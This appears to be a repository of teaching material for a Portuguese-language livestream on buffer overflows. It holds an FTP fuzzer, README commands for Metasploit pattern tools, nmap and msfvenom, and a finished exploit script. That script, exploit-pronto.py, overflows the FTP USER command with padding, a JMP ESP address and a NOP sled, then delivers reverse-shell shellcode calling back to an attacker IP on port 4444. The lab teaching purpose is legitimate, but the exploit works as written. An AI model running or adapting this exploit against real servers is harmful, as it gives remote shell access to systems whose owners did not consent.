├── ward165.exe
├── Buffer Overflow.pptx
├── exploit.py
├── ftp-fuzz.py
├── README.md
└── exploit-pronto.py


/ward165.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/helviojunior/live_bufferoverflow/HEAD/ward165.exe


--------------------------------------------------------------------------------
/Buffer Overflow.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/helviojunior/live_bufferoverflow/HEAD/Buffer Overflow.pptx


--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket
 4 | 
 5 | remoteip="192.168.15.150"
 6 | 
 7 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 8 | try:
 9 |     s.connect((remoteip, 21))
10 | except:
11 |     print ("[-] Connection error!")
12 |     sys.exit(1)
13 | 
14 | buffer="LiveOverflow"
15 | 
16 | 
17 | print s.recv(1024)
18 | print "Mandando a maldade..."
19 | s.send('USER ' + buffer + '\r\n')
20 | print s.recv(1024)
21 | print "Sending pass..."
22 | s.send('USER LiveOverflow\r\n')
23 | print s.recv(1024)
24 | s.close()
25 | 


--------------------------------------------------------------------------------
/ftp-fuzz.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket, time
 4 | 
 5 | remoteip="192.168.15.150"
 6 | 
 7 | size=0
 8 | while True:
 9 | 
10 |     string = "A"*size
11 | 
12 |     print "Fuzzing PASS with %s bytes" % len(string)
13 |     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
14 |     try:
15 |         s.connect((remoteip, 21))
16 |     except:
17 |         print ("[-] Connection error!")
18 |         sys.exit(1)
19 | 
20 |     print s.recv(1024)
21 |     print "Sending username..."
22 |     s.send('USER ' + string + '\r\n')
23 |     print s.recv(1024)
24 |     print "Sending pass..."
25 |     s.send('USER LiveOverflow\r\n')
26 |     print s.recv(1024)
27 |     s.close()
28 | 
29 |     time.sleep(1)
30 | 
31 |     size += 100
32 |     print ""
33 | 
34 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Live - Buffer Overflow, uma introdução ao assunto
 2 | 
 3 | ## Link do Youtube
 4 | 
 5 | Para quem perdeu a Live, segue o link do vídeo gravado do YouTube
 6 | ```
 7 | https://youtu.be/oGZ01rvbfwE
 8 | ```
 9 | 
10 | ## Tabela ASCII
11 | ```
12 | Char  Dec  Oct  Hex   Linux
13 | (nl)   10 0012  x0a   \n
14 | (cr)   13 0015  x0d   \r
15 | A      65 0101  x41
16 | B      66 0102  x42
17 | C      67 0103  x43
18 | ```
19 | 
20 | ## Comandos utilizados
21 | 
22 | **Gerando texto único para identificação da posição do EIP**
23 | ```
24 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
25 | ```
26 | 
27 | **Checando a posição (offset) do EIP**
28 | ```
29 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
30 | ```
31 | 
32 | **Conectando no rdesktop**
33 | ```
34 | rdesktop -u usuario -p senha -g 65% -x m endereco
35 | ```
36 | 
37 | **Buscando informações do serviço**
38 | ```
39 | nmap -Pn -p21 -A 192.168.15.150
40 | ```
41 | 
42 | **Gerando payload do shell reverso**
43 | ```
44 | msfvenom -p windows/shell_reverse_tcp LHOST=IP_atacante LPORT=Porta_atacante -b "\x00\x0a\x0d\x40" -a x86 -f python
45 | ```
46 | 


--------------------------------------------------------------------------------
/exploit-pronto.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket
 4 | 
 5 | remoteip="192.168.15.150"
 6 | 
 7 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 8 | try:
 9 |     s.connect((remoteip, 21))
10 | except:
11 |     print ("[-] Connection error!")
12 |     sys.exit(1)
13 | 
14 | # Gerado usando: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.15.29 LPORT=4444 -b "\x00\x0a\x0d\x40" -a x86 -f python
15 | buf =  ""
16 | buf += "\xb8\xf6\xa1\x6d\xa9\xda\xc1\xd9\x74\x24\xf4\x5b\x31"
17 | buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb5\xaf\x8f"
18 | buf += "\x5c\xc5\x58\xcd\x9f\x35\x99\xb2\x16\xd0\xa8\xf2\x4d"
19 | buf += "\x91\x9b\xc2\x06\xf7\x17\xa8\x4b\xe3\xac\xdc\x43\x04"
20 | buf += "\x04\x6a\xb2\x2b\x95\xc7\x86\x2a\x15\x1a\xdb\x8c\x24"
21 | buf += "\xd5\x2e\xcd\x61\x08\xc2\x9f\x3a\x46\x71\x0f\x4e\x12"
22 | buf += "\x4a\xa4\x1c\xb2\xca\x59\xd4\xb5\xfb\xcc\x6e\xec\xdb"
23 | buf += "\xef\xa3\x84\x55\xf7\xa0\xa1\x2c\x8c\x13\x5d\xaf\x44"
24 | buf += "\x6a\x9e\x1c\xa9\x42\x6d\x5c\xee\x65\x8e\x2b\x06\x96"
25 | buf += "\x33\x2c\xdd\xe4\xef\xb9\xc5\x4f\x7b\x19\x21\x71\xa8"
26 | buf += "\xfc\xa2\x7d\x05\x8a\xec\x61\x98\x5f\x87\x9e\x11\x5e"
27 | buf += "\x47\x17\x61\x45\x43\x73\x31\xe4\xd2\xd9\x94\x19\x04"
28 | buf += "\x82\x49\xbc\x4f\x2f\x9d\xcd\x12\x38\x52\xfc\xac\xb8"
29 | buf += "\xfc\x77\xdf\x8a\xa3\x23\x77\xa7\x2c\xea\x80\xc8\x06"
30 | buf += "\x4a\x1e\x37\xa9\xab\x37\xfc\xfd\xfb\x2f\xd5\x7d\x90"
31 | buf += "\xaf\xda\xab\x37\xff\x74\x04\xf8\xaf\x34\xf4\x90\xa5"
32 | buf += "\xba\x2b\x80\xc6\x10\x44\x2b\x3d\xf3\xab\x04\x32\x1e"
33 | buf += "\x44\x57\x4c\x31\xc8\xde\xaa\x5b\xe0\xb6\x65\xf4\x99"
34 | buf += "\x92\xfd\x65\x65\x09\x78\xa5\xed\xbe\x7d\x68\x06\xca"
35 | buf += "\x6d\x1d\xe6\x81\xcf\x88\xf9\x3f\x67\x56\x6b\xa4\x77"
36 | buf += "\x11\x90\x73\x20\x76\x66\x8a\xa4\x6a\xd1\x24\xda\x76"
37 | buf += "\x87\x0f\x5e\xad\x74\x91\x5f\x20\xc0\xb5\x4f\xfc\xc9"
38 | buf += "\xf1\x3b\x50\x9c\xaf\x95\x16\x76\x1e\x4f\xc1\x25\xc8"
39 | buf += "\x07\x94\x05\xcb\x51\x99\x43\xbd\xbd\x28\x3a\xf8\xc2"
40 | buf += "\x85\xaa\x0c\xbb\xfb\x4a\xf2\x16\xb8\x7b\xb9\x3a\xe9"
41 | buf += "\x13\x64\xaf\xab\x79\x97\x1a\xef\x87\x14\xae\x90\x73"
42 | buf += "\x04\xdb\x95\x38\x82\x30\xe4\x51\x67\x36\x5b\x51\xa2"
43 | 
44 | 
45 | buffer="A" * 485
46 | #77F5801C   FFE4             JMP ESP ==> ntdll.dll
47 | buffer += "\x1c\x80\xf5\x77"
48 | buffer += "\x90"*16
49 | buffer += buf
50 | 
51 | print s.recv(1024)
52 | print "Mandando a maldade..."
53 | s.send('USER ' + buffer + '\r\n')
54 | print s.recv(1024)
55 | print "Sending pass..."
56 | s.send('USER LiveOverflow\r\n')
57 | print s.recv(1024)
58 | s.close()
59 | 


--------------------------------------------------------------------------------